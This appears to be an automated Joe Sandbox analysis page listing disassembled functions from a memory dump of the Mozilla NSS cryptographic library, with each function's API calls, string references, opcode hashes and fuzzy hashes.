Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Error$Arena$Alloc_Item_Valuememcpystrlen$CriticalEnterSectionUnlockZfree$AllocateArena_CompareCondCurrentFreeNotifyThreadfree
String ID: /G6/
API String ID: 24311736-570549270
Opcode ID: 6f12b002985f388c345b7f8cdfa9edaccc2bdf2939d6cf89b124d98217ece74a
Instruction ID: 3d8aa7ccfa961edc30d6a459748ab073fdf295f2add2b92cf7a5b47a6008440f
Opcode Fuzzy Hash: 6f12b002985f388c345b7f8cdfa9edaccc2bdf2939d6cf89b124d98217ece74a
Instruction Fuzzy Hash: 70C16CB5E002159FEB00CF69DE85B9F77F8AF09318F148439E915A7701E731E914ABA2

Function 6C7829A0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 292COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,^jul,00000001,00000000,?,6C756540,?,0000000D,00000000), ref: 6C782A39
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,^jul,00000001,00000000,?,6C756540,?,0000000D,00000000), ref: 6C782A5B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,^jul,00000001,00000000,?,6C756540,?,0000000D), ref: 6C782A6F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jul,00000001), ref: 6C782AAD
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,^jul,00000001,00000000), ref: 6C782ACB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jul,00000001), ref: 6C782ADF
PR_Unlock.NSS3(?), ref: 6C782B38
PR_Unlock.NSS3(?), ref: 6C782B8B

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,^jul,00000001,00000000,?,6C756540,?,0000000D,00000000,?), ref: 6C782CA2

Strings

^jul, xrefs: 6C7829A5
/G6/, xrefs: 6C7829AF
@eul, xrefs: 6C7829E7, 6C782A1D
@eul, xrefs: 6C782A18, 6C782A22

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
String ID: /G6/$@eul$@eul$^jul
API String ID: 2580468248-3052940686
Opcode ID: 8a18206551e87927639bbc7b6dd59709d2efc57faf11f985d7047a5683f53cb9
Instruction ID: 30f0c68b354d3d5f6ea1b17155afe7288efbab681213f0719d49fa269201c73a
Opcode Fuzzy Hash: 8a18206551e87927639bbc7b6dd59709d2efc57faf11f985d7047a5683f53cb9
Instruction Fuzzy Hash: 4FB1E175D012049FDB10DF69DA88BAABBB4FF49309F544539EE05A3B12E731E840CB91

Function 6C7D28C0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6C7D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7D5B56

TlsGetValue.KERNEL32 ref: 6C7D290A
EnterCriticalSection.KERNEL32(00000001), ref: 6C7D291E
TlsGetValue.KERNEL32 ref: 6C7D2937
EnterCriticalSection.KERNEL32(00000001), ref: 6C7D294B
PR_EnterMonitor.NSS3(?), ref: 6C7D2966
PR_EnterMonitor.NSS3(?), ref: 6C7D29AC
PR_ExitMonitor.NSS3(?), ref: 6C7D29D1
PR_EnterMonitor.NSS3(?), ref: 6C7D29F0
PR_EnterMonitor.NSS3(?), ref: 6C7D2A15
PR_EnterMonitor.NSS3(?), ref: 6C7D2A37
PR_ExitMonitor.NSS3(?), ref: 6C7D2A61
PR_ExitMonitor.NSS3(?), ref: 6C7D2A78
PR_ExitMonitor.NSS3(?), ref: 6C7D2A8F
PR_ExitMonitor.NSS3(?), ref: 6C7D2AA6

Part of subcall function 6C809440: TlsGetValue.KERNEL32 ref: 6C80945B
Part of subcall function 6C809440: TlsGetValue.KERNEL32 ref: 6C809479
Part of subcall function 6C809440: EnterCriticalSection.KERNEL32 ref: 6C809495
Part of subcall function 6C809440: TlsGetValue.KERNEL32 ref: 6C8094E4
Part of subcall function 6C809440: TlsGetValue.KERNEL32 ref: 6C809532
Part of subcall function 6C809440: LeaveCriticalSection.KERNEL32 ref: 6C80955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C7D2AF9
free.MOZGLUE(?), ref: 6C7D2B16
PR_Unlock.NSS3(?), ref: 6C7D2B6D
PR_Unlock.NSS3(?), ref: 6C7D2B80

Strings

/G6/, xrefs: 6C7D28CF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID: /G6/
API String ID: 2841089016-570549270
Opcode ID: d3e9c3257f01d857d9f09322f39bd2baf3135a6751b41758bd5c89b193170fd9
Instruction ID: 526fd7b2ff529aa05bdf3747a0b6091b3ff5cd65f539a96f9e052a38d7e20df0
Opcode Fuzzy Hash: d3e9c3257f01d857d9f09322f39bd2baf3135a6751b41758bd5c89b193170fd9
Instruction Fuzzy Hash: 3981D6B1A00B015BDB209F39ED49797B7E5AF45308F054938E85AC7B11EB32F919CB92

Function 6C7AC980 Relevance: 33.3, APIs: 22, Instructions: 298memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,6C7AAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7AC98E

Part of subcall function 6C7A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1000
Part of subcall function 6C7A0FF0: PR_NewLock.NSS3(?,00000800,6C73EF74,00000000), ref: 6C7A1016
Part of subcall function 6C7A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7487ED,00000008,?,00000800,6C73EF74,00000000), ref: 6C7A102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,6C7AAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7AC9A1

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

SECOID_FindOIDByTag_Util.NSS3(0000001A,?,?,?,6C7AAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7AC9D3

Part of subcall function 6C7A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A08B4

SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000,?,?,?,?,6C7AAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7AC9E6

Part of subcall function 6C79FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C798D2D,?,00000000,?), ref: 6C79FB85
Part of subcall function 6C79FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C79FBB1

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,6C7AAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7AC9F5
PORT_ArenaAlloc_Util.NSS3(00000000,00000050,?,?,?,?,?,?,?,6C7AAEB0,?,00000004,00000001,?,00000000,?), ref: 6C7ACA0A
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,6C7AAEB0,?,00000004,00000001), ref: 6C7ACA33
SECOID_FindOIDByTag_Util.NSS3(00000019,?,?,?,?,?,?,?,?,?,?,?,?,6C7AAEB0,?,00000004), ref: 6C7ACA4D
SECITEM_CopyItem_Util.NSS3(00000001,?,00000000), ref: 6C7ACA60
SEC_PKCS7DestroyContentInfo.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C7AAEB0,?,00000004), ref: 6C7ACA6D
PR_Now.NSS3 ref: 6C7ACAD6
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7ACB23
PORT_ArenaAlloc_Util.NSS3(00000000,0000005C), ref: 6C7ACB32
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001), ref: 6C7ACB64
SECOID_SetAlgorithmID_Util.NSS3(00000000,?,00000001,00000000), ref: 6C7ACBBB
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7ACBD0
PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C7ACBF6
PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C7ACC18
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000001,00000000), ref: 6C7ACC39
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C7ACC5B

Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A116E

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C7ACC69
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C7ACC89

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyItem_$AlgorithmAllocateArena_EncodeFindInteger_Tag_Value$ContentCriticalDestroyEnterErrorFreeInfoInitLockMark_PoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1766420342-0
Opcode ID: 115ab2403c96fe1fdd6729ddd45b561dfd5f11679155e74868286b21018d9386
Instruction ID: 2296187637dca711eba90ce3a95fd73c4cbfbf0a1751d3ecab0c750d5ec90857
Opcode Fuzzy Hash: 115ab2403c96fe1fdd6729ddd45b561dfd5f11679155e74868286b21018d9386
Instruction Fuzzy Hash: 22B1B2B5D00306AFEB00DFA5DE45BAA7BB4BF18309F104225E804A7751EB72D995CBA1

Function 6C776D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C776D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C776DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C776DC3

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C776DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C776DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C776E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C776E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C776E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C776EB9

Strings

ulDataLen = %d, xrefs: 6C776E0E
pDigest = 0x%p, xrefs: 6C776E27
(CK_INVALID_HANDLE), xrefs: 6C776DBC
*pulDigestLen = 0x%x, xrefs: 6C776EB4
/G6/, xrefs: 6C776D6C
pData = 0x%p, xrefs: 6C776DF5
C_Digest, xrefs: 6C776D81
hSession = 0x%x, xrefs: 6C776D9E, 6C776DAE
pulDigestLen = 0x%p, xrefs: 6C776E42

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$/G6/$C_Digest
API String ID: 1003633598-1140792426
Opcode ID: f769e930367d78bfd7f2e3ec6f0ff26762a35a835bb59379adc3b55bb22fea0b
Instruction ID: e426ce02b7e39bb5253d23c9ee0e4e32b3dda1fdd337a831c8d54764963084be
Opcode Fuzzy Hash: f769e930367d78bfd7f2e3ec6f0ff26762a35a835bb59379adc3b55bb22fea0b
Instruction Fuzzy Hash: F241C575601008AFDF309BA5EF4DA9E3BB5AB4230CF444474F80997B16DB34A958DBE1

Function 6C778820 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C778846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C778874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C778883

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C778899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C7788BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C7788D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7788EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C778907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C778979

Strings

(CK_INVALID_HANDLE), xrefs: 6C77887C
/G6/, xrefs: 6C77882C
C_DecryptVerifyUpdate, xrefs: 6C778841
pulPartLen = 0x%p, xrefs: 6C778902
*pulPartLen = 0x%x, xrefs: 6C778974
hSession = 0x%x, xrefs: 6C77885E, 6C77886E
pPart = 0x%p, xrefs: 6C7788E7
ulEncryptedPartLen = %d, xrefs: 6C7788CE
pEncryptedPart = 0x%p, xrefs: 6C7788B5

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$/G6/$C_DecryptVerifyUpdate
API String ID: 1003633598-3795217598
Opcode ID: 9313a463acf341be73c34d189f0d0a3f28184dc5542ef1e1950255dc1896a59b
Instruction ID: 31ad40d5b982c0e1699acc9e173cde8c63140815a31f8bf8adf2e1da636fed20
Opcode Fuzzy Hash: 9313a463acf341be73c34d189f0d0a3f28184dc5542ef1e1950255dc1896a59b
Instruction Fuzzy Hash: 2241D375601009AFDF308B96EF4CA9E3BB1AB4231CF484475F80967B12D734A818DBE2

Function 6C776960 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6C776986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7769B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7769C3

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7769D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C7769FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C776A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C776A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C776A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C776AB9

Strings

(CK_INVALID_HANDLE), xrefs: 6C7769BC
/G6/, xrefs: 6C77696C
pulPartLen = 0x%p, xrefs: 6C776A42
*pulPartLen = 0x%x, xrefs: 6C776AB4
hSession = 0x%x, xrefs: 6C77699E, 6C7769AE
C_DecryptUpdate, xrefs: 6C776981
pPart = 0x%p, xrefs: 6C776A27
ulEncryptedPartLen = %d, xrefs: 6C776A0E
pEncryptedPart = 0x%p, xrefs: 6C7769F5

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$/G6/$C_DecryptUpdate
API String ID: 1003633598-569812900
Opcode ID: 5460d9d66e25cf239ede6a5636e51c036df1b92b95c6bfa1fdd51ebf9e591ae8
Instruction ID: cb92937cd9a2925fc33c4f3f71135df88172f8e65964dd1debe191e5f3ff2be6
Opcode Fuzzy Hash: 5460d9d66e25cf239ede6a5636e51c036df1b92b95c6bfa1fdd51ebf9e591ae8
Instruction Fuzzy Hash: D541D875601008ABDF308F55EF4CA5E3BB1AB4230CF498474F90997B16DB34A958DBE1

Function 6C7AE8C0 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6C7AE853,?,FFFFFFFF,?,?,6C7AB0CC,?,6C7AB4A0,?,00000000), ref: 6C7AE8D9

Part of subcall function 6C7A0D30: calloc.MOZGLUE ref: 6C7A0D50
Part of subcall function 6C7A0D30: TlsGetValue.KERNEL32 ref: 6C7A0D6D

Part of subcall function 6C7AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7ADAE2,?), ref: 6C7AC6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6C7AE972
PORT_ArenaMark_Util.NSS3(?), ref: 6C7AE9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7AEA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7AEA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7AEA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C7AEA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C7AEA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7AEACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C7AEB56
PK11_FreeSymKey.NSS3(00000000), ref: 6C7AEBC2
SECOID_FindOID_Util.NSS3(?), ref: 6C7AEBEC
free.MOZGLUE(00000000), ref: 6C7AEC58

Strings

/G6/, xrefs: 6C7AE8CD
Szl, xrefs: 6C7AE9CA, 6C7AEAAB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: /G6/$Szl
API String ID: 759478663-566483267
Opcode ID: fd7cd0c692ec63176bef4dbe6a1fa8774cb27a783c289a4897a577389b4ed497
Instruction ID: 9280b72f2db1cd65364dd647d4076deb75618a894213f4eef65b98d13fe8eb0f
Opcode Fuzzy Hash: fd7cd0c692ec63176bef4dbe6a1fa8774cb27a783c289a4897a577389b4ed497
Instruction Fuzzy Hash: 5BC186B1E01209DFEB04CFA9DA89BAA77B4BF04318F140679E90697751E731E816CBD1

Function 6C7A6CA0 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C871DE0,?), ref: 6C7A6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7A6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C7A6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C7A6D82
DER_GetInteger_Util.NSS3(?), ref: 6C7A6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7A6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C7A6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C7A6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C7A6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C7A6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7A7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C7A7033
free.MOZGLUE(?), ref: 6C7A703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C7A7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C7A7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7A70AF

Strings

/G6/, xrefs: 6C7A6CAF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID: /G6/
API String ID: 2108637330-570549270
Opcode ID: 9433550f94548b558857b8a04129e0a644e6ee3b752be3d76cd0686e09bdddc4
Instruction ID: 2a3ab5f40e6eabbfb26d8d4d6ae8dbcc85b3bb5ad3459e8d307d99c1a3a64d07
Opcode Fuzzy Hash: 9433550f94548b558857b8a04129e0a644e6ee3b752be3d76cd0686e09bdddc4
Instruction Fuzzy Hash: ADA10C715092009BEB009BA8DE49B5B3294EB8531CF244B39E919CBB81F775DA47C793

Function 6C7D6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C7D6BF7), ref: 6C7D6EB6

Part of subcall function 6C731240: TlsGetValue.KERNEL32(00000040,?,6C73116C,NSPR_LOG_MODULES), ref: 6C731267
Part of subcall function 6C731240: EnterCriticalSection.KERNEL32(?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C73127C
Part of subcall function 6C731240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C731291
Part of subcall function 6C731240: PR_Unlock.NSS3(?,?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C7312A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C87FC0A,6C7D6BF7), ref: 6C7D6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7D6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C7D6EFC
PR_NewLock.NSS3 ref: 6C7D6F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7D6F18
